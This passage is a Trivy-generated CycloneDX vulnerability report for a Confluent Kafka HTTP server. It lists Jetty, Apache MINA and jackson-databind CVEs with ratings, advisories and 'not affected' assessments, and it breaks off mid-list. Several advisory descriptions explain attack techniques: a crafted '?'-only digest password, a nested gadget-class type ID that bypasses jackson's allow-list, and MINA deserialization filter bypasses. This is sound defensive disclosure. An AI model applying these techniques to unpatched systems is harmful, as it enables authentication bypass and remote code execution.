{
  "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json",
  "bomFormat": "CycloneDX",
  "specVersion": "1.6",
  "serialNumber": "urn:uuid:f39546bd-9bac-4d65-a579-eb10ebdcf1f2",
  "version": 1,
  "metadata": {
    "timestamp": "2026-08-20T01:18:25+00:00",
    "tools": {
      "components": [
        {
          "type": "application",
          "manufacturer": {
            "name": "Aqua Security Software Ltd."
          },
          "group": "aquasecurity",
          "name": "trivy",
          "version": "0.69.3"
        }
      ]
    },
    "component": {
      "bom-ref": "37340fe6-65e6-4a81-9b6b-725419beccb6",
      "type": "application",
      "supplier": {
        "name": "Confluent"
      },
      "name": "confluent-ce-kafka-http-server",
      "version": "7.7.11-1",
      "properties": [
        {
          "name": "aquasecurity:trivy:SchemaVersion",
          "value": "2"
        }
      ]
    }
  },
  "components": [],
  "dependencies": [],
  "vulnerabilities": [
    {
      "id": "CVE-2024-6763",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 3.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1286
      ],
      "description": "Eclipse Jetty is a lightweight, highly scalable, Java-based web server and Servlet engine . It includes a utility class, HttpURI, for URI/URL parsing.\n\nThe HttpURI class does insufficient validation on the authority segment of a URI.  However the behaviour of HttpURI\n differs from the common browsers in how it handles a URI that would be \nconsidered invalid if fully validated against the RRC.  Specifically HttpURI\n and the browser may differ on the value of the host extracted from an \ninvalid URI and thus a combination of Jetty and a vulnerable browser may\n be vulnerable to a open redirect attack or to a SSRF attack if the URI \nis used after passing validation checks.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-http to version 12.0.12",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-6763"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-6763"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/12012"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-qh8g-58pp-2wxh"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/25"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6763"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0005/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
        }
      ],
      "published": "2024-10-14T16:15:04+00:00",
      "updated": "2026-06-17T08:18:39+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@9.4.61",
          "versions": [
            {
              "version": "9.4.61",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@9.4.63",
          "versions": [
            {
              "version": "9.4.63",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-http@9.4.60",
          "versions": [
            {
              "version": "9.4.60",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:eb74ed3e-1cd3-4ddb-9fe8-cfa4415d9665/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#bf4024c9-f494-43c6-8583-d39eb536fa50"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#be657a82-9bbb-4685-8af4-edf5b2e0cf06"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#de2416fd-bf53-47a1-a32f-4e2c15d69849"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#5ee9da46-cd91-4c8c-96bb-743e48e40c18"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#e9c09f70-7abc-43ab-bf2d-72340e2fd6e9"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f0e043c7-24cd-4284-840d-28eb1d8bc033"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f378a508-4e17-4403-ae40-769bdba64524"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#d52a29e0-8c8d-4972-9e72-34a15203b2ff"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#dcdde829-d041-492e-9b03-601849c798a0"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f52a0152-aa73-4684-94a4-c0965cc89d26"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#df3c48c2-2f0c-4647-b350-b293793ad18f"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.60"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#fc17860b-6ddb-4a8c-a780-d3a6359fd868"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#810ef78f-c8f4-49b4-a29c-d1e821429bff"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.63"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/org.eclipse.jetty/jetty-http@9.4.61"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#f2594813-c56a-415a-b40c-3656c9bcd8cb"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This vulnerability is not exploitable in the context of Confluent Platform as URIs are not used to pass sensitive information. "
      }
    },
    {
      "id": "CVE-2026-10050",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 9.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        173,
        303
      ],
      "description": "In Eclipse Jetty, the Digest authentication server-side component uses ISO-8859-1 to encode the password as bytes.\n\n\n\nThis was done because the initial specification for HTTP did not specify explicitly a charset, and it was assumed to be ISO-8859-1 for historical reasons.\n\n\n\nIf the password contains characters that cannot be represented in ISO-8859-1, they are silently replaced by `?`. This happens with passwords that contain Chinese, Cyrillic or Greek characters, for example: `\u03b1\u03b2123` converts to `??123`.\n\n\n\nAn attacker can send a request with a digest `Authorization` header crafted with a password made of only `?` characters; the server would match any password of the same length that contains non-ISO-8859-1 characters.\n\n\n\nRecent HTTP Digest [RFC-7616](https://datatracker.ietf.org/doc/html/rfc7616) supports a `charset` parameters that defaults to UTF-8 that allows for correct encoding/decoding of passwords.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-security to version 9.4.63, 10.0.31, 11.0.31, 12.0.36, 12.1.10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-10050"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-10050"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/4bcdbc7db387ce9e20e2c7571a7250280466221d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/d0bb829ccecbf19e3ad3d32f2649b2800f01222d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/issues/15136"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15160"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15183"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.36"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.10"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-2fvj-hgj9-j2gr"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/120"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10050"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10050"
        }
      ],
      "published": "2026-08-04T11:22:43+00:00",
      "updated": "2026-08-08T00:38:56+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-security@9.4.61",
          "versions": [
            {
              "version": "9.4.61",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-security@9.4.60",
          "versions": [
            {
              "version": "9.4.60",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#85677481-1bd2-408a-873d-b8922bbdf2ad"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#df448162-65f0-4b34-b167-a549d5518fca"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#dcabb14c-0a24-45f2-ade9-bc04fe06b704"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fd37d4a8-6bb2-494e-b34d-2d4dbaf1717d"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#efd3177f-51f3-48b5-b7a0-5323830a9ef5"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#d2a3cdfd-0b0c-4e5c-b593-673408359710"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#fc771483-e629-4468-a27d-b2fcc53b4e39"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#fb4ca61c-f983-44c4-9508-5a9788080a78"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f25b3834-4061-4340-9b3c-47846dffe162"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#f0121610-f9a8-41f1-9c8a-52f574ad22a9"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#e3af964c-bfb7-40e7-ae87-0e84a22888dd"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#c089a942-94ac-4931-b019-88d7fbcb5add"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.60"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#e996eb44-7dfd-4cd3-9333-21ac027b285f"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#777638db-72e5-4a82-bc0b-007a3d360521"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/org.eclipse.jetty/jetty-security@9.4.61"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#bc07e72c-1d44-4825-a3a1-303bd604b6f8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-47065",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 9.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        502
      ],
      "description": "ZDRES-232: resolveProxyClass Not Overridden - acceptMatchers Filter Bypass via java.lang.reflect.Proxy\n\n\nAssessment: Fully addressed.\n\n\nWhen the serialised stream contains a TC_PROXYCLASSDESC (the marker \nfor a java.lang.reflect.Proxy ), JDK\u2019s ObjectInputStream.readProxyDesc()\n is\ndispatched. JDK then calls the default \nObjectInputStream.resolveProxyClass(interfaces) implementation, which \nperforms Class.forName(intf, false, latestUserDefinedLoader()) for EACH \ninterface name and constructs the proxy class \u00e2\u20ac\u201d bypassing the accepted\n classes list .\n\n\nZDRES-233: Class.forName(name, initialize=true, classLoader) in \nreadClassDescriptor Triggers Static Initialiser of Allow-Listed Classes\n\n\nAssessment: Fully addressed.\n\n\nFor ANY class on the allow-list, deserialising a stream that names it triggers the class\u2019s \n (static initialiser) BEFORE any instance is constructed. This means an \nattacker who supplies a class name on the allow-list (e.g., the \ndeveloper wrote accept(\u201ccom.myapp.*\") , attacker supplies \ncom.myapp.SomeClass ) causes <clinit> of SomeClass \u00e2\u20ac\u201d and many \nreal-world classes have side-effecting static initialisers\n\n\nBoth issues have been fixed.",
      "recommendation": "Upgrade org.apache.mina:mina-core to version 2.2.8, 2.1.13, 2.0.29",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-47065"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-47065"
        },
        {
          "url": "https://github.com/apache/mina"
        },
        {
          "url": "https://lists.apache.org/thread/y7xj1bl8qo47p9bktb11hg5v6k1d4dyj"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47065"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47065"
        }
      ],
      "published": "2026-06-03T11:16:19+00:00",
      "updated": "2026-07-22T19:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.mina/mina-core@2.2.7",
          "versions": [
            {
              "version": "2.2.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.mina/mina-core@2.0.28",
          "versions": [
            {
              "version": "2.0.28",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#fa054cf3-071c-4f0c-a366-e418f4cc1bf0"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e615021a-3058-4357-986e-ccc20a25d1bb"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#e028f2c8-b156-4e8d-8ea5-3280c2292cee"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#6c0d2d70-515d-495a-9712-e1485a3e9cc3"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#d6ed6ffd-4f60-47c1-a589-f906cebd865a"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#f9a3b6fb-96b5-4168-9a50-b5b95197c873"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#eccc3a9e-6319-439d-abd2-a721a2bf0b92"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f7039278-476e-45f1-96dd-2ab0af7c544a"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#e1e0d41d-1812-40db-8ec5-0674dfa060a6"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#b473d80b-fa29-446f-a59f-61eaa43ab8b1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e1dc6db1-e764-47ba-aa3e-9735b5786b6c"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:maven/org.apache.mina/mina-core@2.0.28"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#effa8df6-5825-455a-9380-41ce9fb490c3"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#a9a47846-9284-4d6e-8209-08619a490206"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/org.apache.mina/mina-core@2.2.7"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#ec29ee43-a1a5-4f17-a462-08d3acf21827"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The affected component (org.apache.mina:mina-core) is reachable only as Kerberos test-only tooling never shipped in the runtime, or as an unused transitive dependency of the REST framework's optional LDAP-JAAS module which never invokes mina's deserialization API."
      }
    },
    {
      "id": "CVE-2026-54512",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        184,
        502
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.10.0 until 2.18.8, 2.21.4, and 3.1.4, jackson-databind's PolymorphicTypeValidator (PTV) is the primary safety mechanism guarding polymorphic deserialization. When polymorphic typing is enabled and a type identifier contains generic parameters (i.e. the type ID string contains <), DatabindContext._resolveAndValidateGeneric() validates only the raw container class name (the substring before <) against the configured PTV. If the container type is approved, the method parses the full canonical type string via TypeFactory.constructFromCanonical() and returns the fully parameterized type without ever validating the nested type arguments against the PTV. The nested type arguments are then resolved, instantiated, and populated as beans during deserialization. An attacker who controls the type ID can therefore place a denied class as a generic type parameter of an allowed container \u2014 for example java.util.ArrayList<com.evil.Gadget> when only java.util.ArrayList is allow-listed. The container passes the PTV check; com.evil.Gadget is loaded via Class.forName(name, true, loader), instantiated, and its properties are set from attacker-controlled JSON. This completely bypasses an explicitly configured PTV allow-list. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 3.1.4, 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40895"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43400"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54512"
        },
        {
          "url": "https://bugzilla.redhat.com/2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492015"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54512"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54513"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-43400.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:40895"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/434d6c511de7fdd9872f29157aafb6162d12d8d5"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5988"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-j3rv-43j4-c7qm"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54512.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-43400.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54512"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54512"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T21:01:36+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:25a5427e-48f8-43f6-b383-dbdd2ba4d227/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:032cfb2d-9f0d-4398-9524-dc61f4303447/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#6aadec1e-67f1-4295-a31f-0cca5e9c6a75"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:54f7afa1-c363-44db-8665-91fdce8b966d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#da81c428-bdc3-4b4e-95a0-9ea1c83fde9b"
        },
        {
          "ref": "urn:cdx:18887482-e12e-40ec-af4e-627193cbd5ab/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#c5274910-28c8-433d-a4d4-d0b636683cd4"
        },
